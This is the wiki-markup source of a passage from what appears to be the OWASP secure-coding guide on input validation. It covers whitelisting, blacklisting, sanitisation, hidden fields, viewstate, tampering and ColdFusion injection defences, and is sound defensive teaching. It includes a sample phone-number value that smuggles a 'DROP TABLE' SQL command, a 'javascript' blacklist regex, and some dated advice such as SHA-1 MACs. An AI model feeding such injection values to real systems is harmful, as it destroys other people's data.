ValidationEngine validator = new ValidationEngine();&lt;br /&gt;
boolean isValidPostcode = validator.isPostcode(taintPostcode);&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Reject known bad===&lt;br /&gt;
&lt;br /&gt;
This strategy, also known as &amp;quot;negative&amp;quot; or &amp;quot;blacklist&amp;quot; validation, is a weak alternative to positive validation. Essentially, if you don't expect to see characters such as %3f or JavaScript or similar, reject strings containing them. This is a dangerous strategy, because the set of possible bad data is potentially infinite. Adopting this strategy means that you will have to maintain the list of &amp;quot;known bad&amp;quot; characters and patterns forever, and you will by definition have incomplete protection.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
public String removeJavascript(String input) {&lt;br /&gt;
    Pattern p = Pattern.compile(&amp;quot;javascript&amp;quot;, Pattern.CASE_INSENSITIVE);&lt;br /&gt;
    return (!p.matcher(input).find()) ? input : &amp;quot;&amp;quot;;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Category:FIXME|Is the CSS Cheat Sheet in the current development guide? I wanted to link to that and couldn't find it ]]&lt;br /&gt;
It can take upwards of 90 regular expressions (see the CSS Cheat Sheet in the Development Guide 2.0) to eliminate known malicious input, and each regex needs to be run over every field. Obviously, this is slow and not secure. Just rejecting the &amp;quot;current known bad&amp;quot; (at the time of writing, hundreds of strings and literally millions of combinations) is insufficient if the input is a string. This strategy is directly akin to anti-virus pattern updates: unless the business will allow updating the &amp;quot;bad&amp;quot; regexes on a daily basis and will support someone to research new attacks regularly, this approach will be defeated before long.&lt;br /&gt;
&lt;br /&gt;
===Sanitize===&lt;br /&gt;
&lt;br /&gt;
Rather than accept or reject input, another option is to change the user input into an acceptable format.&lt;br /&gt;
&lt;br /&gt;
==== Sanitize with Whitelist ====&lt;br /&gt;
&lt;br /&gt;
Any characters which are not part of an approved list can be removed, encoded or replaced.&lt;br /&gt;
&lt;br /&gt;
Here are some examples:&lt;br /&gt;
&lt;br /&gt;
If you expect a phone number, you can strip out all non-digit characters.  Thus, &amp;quot;(555)123-1234&amp;quot;, &amp;quot;555.123.1234&amp;quot;, and &amp;quot;555\&amp;quot;;DROP TABLE USER;--123.1234&amp;quot; all convert to 5551231234.  Note that you should proceed to validate the resulting numbers as well.  As you see, this is not only beneficial for security, but it also allows you to accept and use a wider range of valid user input.&lt;br /&gt;
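As a sketch in Java (assuming ten-digit North American numbers purely for illustration), the strip-then-validate step looks like:&lt;br /&gt;

```java
class PhoneSanitizer {
    // Strip everything except digits, then validate the result; ten digits
    // are assumed here (North American numbers) purely for illustration.
    static String sanitizePhone(String input) {
        if (input == null) {
            return "";
        }
        String digits = input.replaceAll("[^0-9]", "");
        return digits.length() == 10 ? digits : "";
    }
}
```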
&lt;br /&gt;
If you want text from a user comment form, it is difficult to decide on a legitimate set of characters because nearly every character has a legitimate use. One solution is to replace all non-alphanumeric characters with an encoded version, so &amp;quot;I like your web page!&amp;quot; might emerge from your sanitization routines as &amp;quot;I+like+your+web+page%21&amp;quot;. (This example uses [http://en.wikipedia.org/wiki/Url_encoding URL encoding].)&lt;br /&gt;
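In Java, for example, the standard library's java.net.URLEncoder performs exactly this kind of whitelist replacement:&lt;br /&gt;

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

class CommentEncoder {
    // URL-encode a comment: characters outside URLEncoder's safe set
    // (letters, digits, ".", "-", "*", "_") become %XX escapes and
    // spaces become "+".
    static String encodeComment(String comment) {
        return URLEncoder.encode(comment, StandardCharsets.UTF_8);
    }
}
```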
&lt;br /&gt;
You can also go one step further. Say you want to set up a site where users can upload arbitrary files so they can share them or download them again from another location. In this case validation is impossible because there is no valid or invalid content. Because your only concern is protecting your app from malicious input, and you don't need to actually do anything except accept, store and transmit the file, you can encode the entire file in, say, [http://en.wikipedia.org/wiki/Base64 base64].&lt;br /&gt;
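A minimal sketch of this store-and-forward encoding, using the JDK's built-in Base64 codec:&lt;br /&gt;

```java
import java.util.Base64;

class UploadStore {
    // Encode arbitrary uploaded bytes as Base64 text so they can be
    // stored and transmitted without the content ever being interpreted.
    static String store(byte[] fileBytes) {
        return Base64.getEncoder().encodeToString(fileBytes);
    }

    // Recover the original bytes exactly on download.
    static byte[] retrieve(String stored) {
        return Base64.getDecoder().decode(stored);
    }
}
```

The round trip is lossless, so the file is returned to other users byte-for-byte while your application only ever handles a constrained alphabet.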
&lt;br /&gt;
==== Sanitize with Blacklist ====&lt;br /&gt;
&lt;br /&gt;
Eliminate or translate characters (such as to HTML entities, or by removing quotes) in an effort to make the input &amp;quot;safe&amp;quot;.&lt;br /&gt;
Like reject-known-bad blacklists, this approach requires maintenance and is usually incomplete. As most fields have a particular grammar, it is simpler, faster, and more secure to validate against a single correct positive test than to try to include complex and slow sanitization routines for all current and future attacks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
public String quoteApostrophe(String input) {&lt;br /&gt;
    if (input != null)&lt;br /&gt;
        return input.replaceAll(&amp;quot;[\']&amp;quot;, &amp;quot;&amp;amp;amp;rsquo;&amp;quot;);&lt;br /&gt;
    else&lt;br /&gt;
        return null;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===No validation===&lt;br /&gt;
&lt;br /&gt;
This is inherently unsafe and strongly discouraged. The business must sign off on each and every instance of no validation, as the lack of validation usually allows attackers to bypass application, host, and network security controls.&lt;br /&gt;
&lt;br /&gt;
 account.setAcctId(getParameter(&amp;quot;formAcctNo&amp;quot;));&lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 public void setAcctId(String acctId) {&lt;br /&gt;
 	cAcctId = acctId;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==Prevent parameter tampering ==&lt;br /&gt;
&lt;br /&gt;
There are many input sources:&lt;br /&gt;
&lt;br /&gt;
* HTTP headers, such as REMOTE_ADDR, PROXY_VIA or similar&lt;br /&gt;
&lt;br /&gt;
* Environment variables, such as getenv() or via server properties &lt;br /&gt;
&lt;br /&gt;
* All GET, POST and Cookie data&lt;br /&gt;
&lt;br /&gt;
This includes supposedly tamper-resistant fields such as radio buttons, drop-downs, etc. - any client-side HTML can be re-written to suit the attacker.&lt;br /&gt;
&lt;br /&gt;
* Configuration data (mistakes happen :))&lt;br /&gt;
&lt;br /&gt;
* External systems (via any form of input mechanism, such as XML input, RMI, web services, etc)&lt;br /&gt;
&lt;br /&gt;
All of these data sources supply untrusted input. Data received from untrusted data sources must be properly checked before first use.&lt;br /&gt;
&lt;br /&gt;
==Hidden fields ==&lt;br /&gt;
&lt;br /&gt;
Hidden fields are a simple way to avoid storing state on the server. Their use is particularly prevalent in &amp;quot;wizard-style&amp;quot; multi-page forms. However, their use exposes the inner workings of your application, and exposes data to trivial tampering, replay, and validation attacks. In general, only use hidden fields for page sequence.&lt;br /&gt;
&lt;br /&gt;
If you have to use hidden fields, there are some rules:&lt;br /&gt;
&lt;br /&gt;
* Secrets, such as passwords, should never be sent in the clear&lt;br /&gt;
&lt;br /&gt;
* Hidden fields need integrity checks, and should preferably be encrypted using non-constant initialization vectors (i.e. different users at different times get different, yet cryptographically strong, random IVs)&lt;br /&gt;
&lt;br /&gt;
* Encrypted hidden fields must be robust against replay attacks, which means some form of temporal keying&lt;br /&gt;
&lt;br /&gt;
* Data sent to the user must be re-validated on the server once the last page has been received, even if it was validated when first submitted - this helps reduce the risk from replay attacks.&lt;br /&gt;
&lt;br /&gt;
The preferred integrity control is at least an HMAC using SHA-256; preferably, the data should be digitally signed or encrypted using PGP. IBMJCE supports SHA-256, but PGP support in the JCE requires the inclusion of the Legion of the Bouncy Castle (http://www.bouncycastle.org/) JCE classes.&lt;br /&gt;
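As a sketch of the HMAC option (the class and method names below are illustrative, not from the guide), a hidden field's value can be tagged with an HMAC-SHA256 using the standard JCE:

```java
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class HiddenFieldMac {
    // Demo key only: a real application must load this from secure configuration.
    private static final byte[] KEY =
            "replace-with-a-real-secret-key".getBytes(StandardCharsets.UTF_8);

    // Compute the tag that accompanies the hidden field's value.
    public static String sign(String fieldValue) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(KEY, "HmacSHA256"));
        return Base64.getEncoder()
                     .encodeToString(mac.doFinal(fieldValue.getBytes(StandardCharsets.UTF_8)));
    }

    // On postback, recompute and compare; reject the request on mismatch.
    public static boolean verify(String fieldValue, String tag) throws Exception {
        return sign(fieldValue).equals(tag); // use a constant-time compare in production
    }
}
```

The server emits both the field value and its tag, and refuses any postback whose recomputed tag does not match.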
&lt;br /&gt;
It is simpler to store this data temporarily in the session object. Using the session object is the safest option: the data is never visible to the user, and it requires (far) less code, almost no CPU, disk, or I/O utilization, less memory (particularly on large multi-page forms), and less network consumption. &lt;br /&gt;
&lt;br /&gt;
In the case of the session object being backed by a database, large session objects may become too large for the inbuilt handler. In this case, the recommended strategy is to store the validated data in the database, but mark the transaction as &amp;quot;incomplete.&amp;quot; Each page then updates the incomplete transaction until it is ready for submission. This minimizes the database load, session size, and per-request activity, whilst remaining tamperproof. &lt;br /&gt;
&lt;br /&gt;
Code containing hidden fields should be rejected during code reviews.&lt;br /&gt;
&lt;br /&gt;
==ASP.NET Viewstate ==&lt;br /&gt;
&lt;br /&gt;
ASP.NET sends form data back to the client in a hidden “Viewstate” field. Despite looking forbidding, this “encryption” is merely base64-encoded plain text, and in ASP.NET 1.0 it has no data integrity without further action on your behalf. In ASP.NET 1.1 and 2.0, tamper proofing, called &amp;quot;enableViewStateMAC&amp;quot;, is on by default, using a SHA-1 hash.&lt;br /&gt;
&lt;br /&gt;
Any application framework with a similar mechanism might be at fault – you should investigate your application framework’s support for sending data back to the user. Preferably it should not round trip.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
These configurations are set hierarchically in the .NET framework. The machine.config file contains the global configuration; each web directory may contain a web.config file further specifying or overriding that configuration; and each page may contain @page directives specifying the same configuration or overrides. You must check all three locations:&lt;br /&gt;
&lt;br /&gt;
* If the enableViewStateMac is not set to “true”, you are at risk if your viewstate contains authorization state&lt;br /&gt;
&lt;br /&gt;
* If the viewStateEncryptionMode is not set to “always”, you are at risk if your viewstate contains secrets such as credentials&lt;br /&gt;
&lt;br /&gt;
* If you share a host with many other customers, you all share the same machine key by default in ASP.NET 1.1. In ASP.NET 2.0, it is possible to configure unique viewstate keys per application&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* If your application relies on data returning from the viewstate without being tampered with, you should turn on viewstate integrity checks at the least, and strongly consider:&lt;br /&gt;
&lt;br /&gt;
* Encrypt viewstate if any of the data is application sensitive&lt;br /&gt;
&lt;br /&gt;
* Upgrade to ASP.NET 2.0 as soon as practical if you are on a shared hosting arrangement&lt;br /&gt;
&lt;br /&gt;
* Move truly sensitive viewstate data to the session variable instead&lt;br /&gt;
&lt;br /&gt;
===Selects, radio buttons, and checkboxes ===&lt;br /&gt;
&lt;br /&gt;
It is a commonly held belief that the value settings for these items cannot easily be tampered with. This is wrong. In the following example, actual account numbers are used, which can lead to compromise:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html:radio value=&amp;quot;&amp;lt;%=acct.getCardNumber(1).toString( )%&amp;gt;&amp;quot; property=&amp;quot;acctNo&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;bean:message key=&amp;quot;msg.card.name&amp;quot; arg0=&amp;quot;&amp;lt;%=acct.getCardName(1).toString( )%&amp;gt;&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html:radio value=&amp;quot;&amp;lt;%=acct.getCardNumber(2).toString( )%&amp;gt;&amp;quot; property=&amp;quot;acctNo&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;bean:message key=&amp;quot;msg.card.name&amp;quot; arg0=&amp;quot;&amp;lt;%=acct.getCardName(2).toString( )%&amp;gt;&amp;quot; /&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This produces (for example):&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctNo&amp;quot; value=&amp;quot;455712341234&amp;quot;&amp;gt;Gold Card&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctNo&amp;quot; value=&amp;quot;455712341235&amp;quot;&amp;gt;Platinum Card&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If the value is retrieved and then used directly in a SQL query, an interesting form of SQL injection may occur: authorization tampering leading to information disclosure. As the connection pool connects to the database using a single user, it may be possible to see other users' accounts if the SQL looks something like this:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
String acctNo = request.getParameter(&amp;quot;acctNo&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
String sql = &amp;quot;SELECT acctBal FROM accounts WHERE acctNo = ?&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
PreparedStatement st = conn.prepareStatement(sql);&lt;br /&gt;
&lt;br /&gt;
st.setString(1, acctNo);&lt;br /&gt;
&lt;br /&gt;
ResultSet rs = st.executeQuery();&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This should be re-written to retrieve the account number via an index, and to include the client's unique ID to ensure that other valid account numbers are not exposed:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
String acctNo = acct.getCardNumber(request.getParameter(&amp;quot;acctIndex&amp;quot;));&lt;br /&gt;
&lt;br /&gt;
String sql = &amp;quot;SELECT acctBal FROM accounts WHERE acct_id = ? AND acctNo = ?&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
PreparedStatement st = conn.prepareStatement(sql);&lt;br /&gt;
&lt;br /&gt;
st.setString(1, acct.getID());&lt;br /&gt;
&lt;br /&gt;
st.setString(2, acctNo);&lt;br /&gt;
&lt;br /&gt;
ResultSet rs = st.executeQuery();&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This approach requires rendering input values from 1 to ... x, and assuming accounts are stored in a Collection which can be iterated using logic:iterate:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;logic:iterate id=&amp;quot;loopVar&amp;quot; name=&amp;quot;MyForm&amp;quot; property=&amp;quot;values&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html:radio property=&amp;quot;acctIndex&amp;quot; idName=&amp;quot;loopVar&amp;quot; value=&amp;quot;value&amp;quot;/&amp;gt;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;bean:write name=&amp;quot;loopVar&amp;quot; property=&amp;quot;name&amp;quot;/&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/logic:iterate&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The code will emit HTML with the values &amp;quot;1&amp;quot; .. &amp;quot;x&amp;quot; as per the collection's content. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctIndex&amp;quot; value=&amp;quot;1&amp;quot; /&amp;gt;Gold Credit Card&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;acctIndex&amp;quot; value=&amp;quot;2&amp;quot; /&amp;gt;Platinum Credit Card&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This approach should be used for any input type that allows a value to be set: radio buttons, checkboxes, and particularly select / option lists.&lt;br /&gt;
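Server-side, resolving the submitted index can be sketched as follows (the method and variable names are illustrative; the account numbers come from the user's own server-held list, never from the client):

```java
import java.util.List;

public class AccountResolver {
    // Map the client-supplied 1-based index back to the user's own account list.
    // Anything that is not a number, or is out of range, is rejected (null).
    public static String resolveAccount(List<String> usersAccounts, String acctIndexParam) {
        int idx;
        try {
            idx = Integer.parseInt(acctIndexParam);
        } catch (NumberFormatException e) {
            return null; // not a number: tampered or malformed input
        }
        if (idx < 1 || idx > usersAccounts.size()) {
            return null; // out of range: not one of this user's accounts
        }
        return usersAccounts.get(idx - 1); // safe: the value never came from the client
    }
}
```

A tampered index simply fails to resolve, so no other user's account number can be reached.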
&lt;br /&gt;
===Per-User Data ===&lt;br /&gt;
&lt;br /&gt;
In fully normalized databases, the aim is to minimize the amount of repeated data. However, some data is inferred. For example, users can see messages that are stored in a messages table. Some messages are private to the user. However, in a fully normalized database, the list of message IDs is kept in another table:&lt;br /&gt;
&amp;lt;!-- dkaplan: IMPORTANT: if users have messages, this is NOT a normalized table, it is denormalized.  If users have messages, it is normalized by putting a userid in the MESSAGES table. This section is claiming the opposite.  --&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
+------------------------+&lt;br /&gt;
|       MESSAGES         |&lt;br /&gt;
+------------------------+&lt;br /&gt;
|  msgid   |   message   |&lt;br /&gt;
+------------------------+&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If a user marks a message for deletion, the usual way is to recover the message ID from the user, and delete that:&lt;br /&gt;
&lt;br /&gt;
 DELETE FROM message WHERE msgid='frmMsgId' &lt;br /&gt;
&lt;br /&gt;
However, how do you know the user is eligible to delete that message ID? Such tables need to be denormalized slightly to include a user ID, making it possible to delete the message safely with a single query. For example, by adding back an (optional) uid column, the delete is now made reasonably safe:&lt;br /&gt;
&lt;br /&gt;
 DELETE FROM message WHERE uid='session.myUserID' and msgid='frmMsgId'; &lt;br /&gt;
&lt;br /&gt;
Where the data is potentially both a private resource and a public resource (for example, in the secure message service, broadcast messages are just a special type of private message), additional precautions need to be taken to prevent users from deleting public resources without authorization. This can be done using role based checks, as well as using SQL statements to discriminate by message type:&lt;br /&gt;
&lt;br /&gt;
 DELETE FROM message  &lt;br /&gt;
 WHERE&lt;br /&gt;
 uid='session.myUserID' AND&lt;br /&gt;
 msgid='frmMsgId' AND&lt;br /&gt;
 broadcastFlag = false;&lt;br /&gt;
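The ownership rule that the SQL above encodes can be sketched in plain Java (an in-memory stand-in for the messages table; the class and field names are illustrative):

```java
import java.util.HashMap;
import java.util.Map;

public class MessageStore {
    private static class Message {
        final String uid;          // owning user
        final boolean broadcast;   // public resource flag
        Message(String uid, boolean broadcast) { this.uid = uid; this.broadcast = broadcast; }
    }

    private final Map<String, Message> messages = new HashMap<>();

    public void put(String msgId, String uid, boolean broadcast) {
        messages.put(msgId, new Message(uid, broadcast));
    }

    // Mirrors: DELETE FROM message WHERE uid=? AND msgid=? AND broadcastFlag = false
    public boolean delete(String sessionUid, String msgId) {
        Message m = messages.get(msgId);
        if (m == null || m.broadcast || !m.uid.equals(sessionUid)) {
            return false; // not found, public, or not owned by the caller
        }
        messages.remove(msgId);
        return true;
    }
}
```

The user's ID comes from the session, never from the form, so a tampered msgid deletes nothing.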
&lt;br /&gt;
==URL encoding ==&lt;br /&gt;
&lt;br /&gt;
Data sent via the URL, which is strongly discouraged, should be URL encoded on output and decoded on input. This reduces the likelihood of cross-site scripting attacks succeeding.&lt;br /&gt;
&lt;br /&gt;
In general, do not send data via GET requests except for navigational purposes.&lt;br /&gt;
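In Java, for example, the encode/decode pair is symmetric, and every URL metacharacter becomes a harmless %XX escape (a minimal sketch):

```java
import java.net.URLDecoder;
import java.net.URLEncoder;

public class UrlCodec {
    // Encode before placing data in a URL: metacharacters become %XX escapes.
    public static String encode(String raw) throws Exception {
        return URLEncoder.encode(raw, "UTF-8");
    }

    // Decode once, on receipt, before validation and first use.
    public static String decode(String encoded) throws Exception {
        return URLDecoder.decode(encoded, "UTF-8");
    }
}
```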
&lt;br /&gt;
==HTML encoding ==&lt;br /&gt;
&lt;br /&gt;
Data sent to the user needs to be safe for the user to view. This can be done using &amp;lt;bean:write ...&amp;gt; and friends. Do not use &amp;lt;%=var%&amp;gt; unless it is used to supply an argument for &amp;lt;bean:write...&amp;gt; or similar. &lt;br /&gt;
&lt;br /&gt;
HTML encoding translates a range of characters into their HTML entities. For example, &amp;gt; becomes &amp;amp;amp;gt;. This will still display as &amp;gt; in the user's browser, but it is a safe alternative.&lt;br /&gt;
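Outside of a tag library, the same translation can be done by hand. A minimal sketch covering the five characters with special meaning in HTML (a real application should use a maintained encoding library rather than this illustration):

```java
public class HtmlEncoder {
    // Translate characters with special meaning in HTML into entities.
    public static String encode(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}
```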
&lt;br /&gt;
==Encoded strings ==&lt;br /&gt;
&lt;br /&gt;
Some strings may be received in encoded form. It is essential to send the correct locale to the user so that the web server and application server can provide a single level of canonicalization prior to first use. &lt;br /&gt;
&lt;br /&gt;
Do not use getReader() or getInputStream(), as these input methods do not decode encoded strings. If you need to use these constructs, you must decode and canonicalize the data by hand. &lt;br /&gt;
&lt;br /&gt;
==Data Validation and Interpreter Injection ==&lt;br /&gt;
&lt;br /&gt;
This section focuses on preventing injection in ColdFusion. Interpreter Injection involves manipulating application parameters to execute malicious code on the system. The most prevalent of these is SQL injection but it also includes other injection techniques, including LDAP, ORM, User Agent, XML, etc. – see [[Reviewing_Code_for_OS_Injection|Interpreter Injection]] for greater details. As a developer you should assume that all input is malicious. Before processing any input coming from a user, data source, component, or data service it should be validated for type, length, and/or range. ColdFusion includes support for Regular Expressions and CFML tags that can be used to validate input.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''SQL Injection'''&lt;br /&gt;
&lt;br /&gt;
[[SQL Injection]] involves sending extraneous SQL queries as variables. ColdFusion provides the &amp;lt;cfqueryparam&amp;gt; and &amp;lt;cfprocparam&amp;gt; tags for validating database parameters. These tags nest inside &amp;lt;cfquery&amp;gt; and &amp;lt;cfstoredproc&amp;gt;, respectively. For dynamic SQL submitted in &amp;lt;cfquery&amp;gt;, use the CFSQLTYPE attribute of &amp;lt;cfqueryparam&amp;gt; to validate variables against the expected database datatype. Similarly, use the CFSQLTYPE attribute of &amp;lt;cfprocparam&amp;gt; to validate the datatypes of stored procedure parameters passed through &amp;lt;cfstoredproc&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
You can also strengthen your systems against SQL Injection by disabling the Allowed SQL operations for individual data sources. See the '''Configuration''' section below for more information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''LDAP Injection'''&lt;br /&gt;
&lt;br /&gt;
[[LDAP injection]] is an attack used to exploit web based applications that construct LDAP statements based on user input. ColdFusion uses the &amp;lt;cfldap&amp;gt; tag to communicate with LDAP servers. This tag has an ACTION attribute which dictates the query performed against the LDAP. The valid values for this attribute are: add, delete, query (default), modify, and modifyDN. &amp;lt;cfldap&amp;gt; calls are turned into JNDI (Java Naming And Directory Interface) lookups. However, because &amp;lt;cfldap&amp;gt; wraps the calls, it will throw syntax errors if native JNDI code is passed to its attributes making LDAP injection more difficult.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''XML Injection'''&lt;br /&gt;
&lt;br /&gt;
Two parsers exist for XML data – SAX and DOM. ColdFusion uses DOM, which reads the entire XML document into the server’s memory; this requires the administrator to restrict the size of the JVM containing ColdFusion. ColdFusion is built on Java, so by default, entity references are expanded during parsing. To prevent unbounded entity expansion, filter out DOCTYPE elements before a string is converted to an XML DOM.&lt;br /&gt;
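Since ColdFusion's XML handling sits on a standard Java DOM parser, the equivalent Java-level defense is to refuse any document that carries a DOCTYPE before it ever reaches the DOM. A sketch using the JAXP disallow-doctype-decl feature (supported by the JDK's default parser):

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

public class SafeXmlParser {
    public static Document parseUntrusted(String xml) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Rejecting the DOCTYPE outright disables all entity expansion,
        // including "billion laughs"-style unbounded expansion.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return dbf.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
    }
}
```

A document with a DOCTYPE now fails at parse time instead of consuming server memory.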
&lt;br /&gt;
&lt;br /&gt;
After the DOM has been read, to reduce the risk of XML Injection use the ColdFusion XML decision functions: isXML(), isXmlAttribute(), isXmlElement(), isXmlNode(), and isXmlRoot(). The isXML() function determines if a string is well-formed XML. The other functions determine whether or not the passed parameter is a valid part of an XML document. Use the xmlValidate() function to validate external XML documents against a Document Type Definition (DTD) or XML Schema.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Event Gateway, IM, and SMS Injection'''&lt;br /&gt;
&lt;br /&gt;
ColdFusion MX 7 enables Event Gateways, instant messaging (IM), and SMS (short message service) for interacting with external systems. Event Gateways are ColdFusion components that respond asynchronously to non-HTTP requests – e.g. instant messages, SMS text from wireless devices, etc. ColdFusion provides Lotus Sametime and XMPP (Extensible Messaging and Presence Protocol) gateways for instant messaging. It also provides an event gateway for interacting with SMS text messages.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Injection along these gateways can happen when end users (and/or systems) send malicious code to execute on the server. These gateways all utilize ColdFusion Components (CFCs) for processing. Use standard ColdFusion functions, tags, and validation techniques to protect against malicious code injection. Sanitize all input strings and do not allow un-validated code to access backend systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices'''&lt;br /&gt;
&lt;br /&gt;
*Use the XML functions to validate XML input.&lt;br /&gt;
&lt;br /&gt;
*Before performing XPath searches and transformations in ColdFusion, validate the source before executing.&lt;br /&gt;
&lt;br /&gt;
*Use ColdFusion validation techniques to sanitize strings passed to xmlSearch for performing XPath queries. &lt;br /&gt;
&lt;br /&gt;
*When performing XML transformations only use a trusted source for the XSL stylesheet.&lt;br /&gt;
&lt;br /&gt;
*Ensure that the memory size of the Java Sandbox containing ColdFusion can handle large XML documents without adversely affecting server resources.&lt;br /&gt;
&lt;br /&gt;
*Set the memory value to less than the amount of RAM on the server (-Xmx).&lt;br /&gt;
&lt;br /&gt;
*Remove DOCTYPE elements from the XML string before converting it to an XML object.&lt;br /&gt;
&lt;br /&gt;
*Use scriptProtect to thwart most cross-site scripting attempts. Set scriptProtect to All in the Application.cfc.&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cfparam&amp;gt; or &amp;lt;cfargument&amp;gt; to instantiate variables in ColdFusion. Use this tag with the name and type attributes. If the value is not of the specified type, ColdFusion returns an error.&lt;br /&gt;
&lt;br /&gt;
*To handle untyped variables, use IsValid() to validate their values against any legal object type that ColdFusion supports.&lt;br /&gt;
&lt;br /&gt;
*Use &amp;lt;cfqueryparam&amp;gt; and &amp;lt;cfprocparam&amp;gt; to validate dynamic SQL variables against database datatypes.&lt;br /&gt;
&lt;br /&gt;
*Use CFLDAP for accessing LDAP servers. Avoid allowing native JNDI calls to connect to LDAP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practice in Action'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The sample code below shows a database authentication function using some of the input validation techniques discussed in this section.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;cffunction name=&amp;quot;dblogin&amp;quot; access=&amp;quot;private&amp;quot; output=&amp;quot;false&amp;quot; returntype=&amp;quot;struct&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strUserName&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfargument name=&amp;quot;strPassword&amp;quot; required=&amp;quot;true&amp;quot; type=&amp;quot;string&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;cfset var retargs = StructNew()&amp;gt;&lt;br /&gt;
&lt;br /&gt;
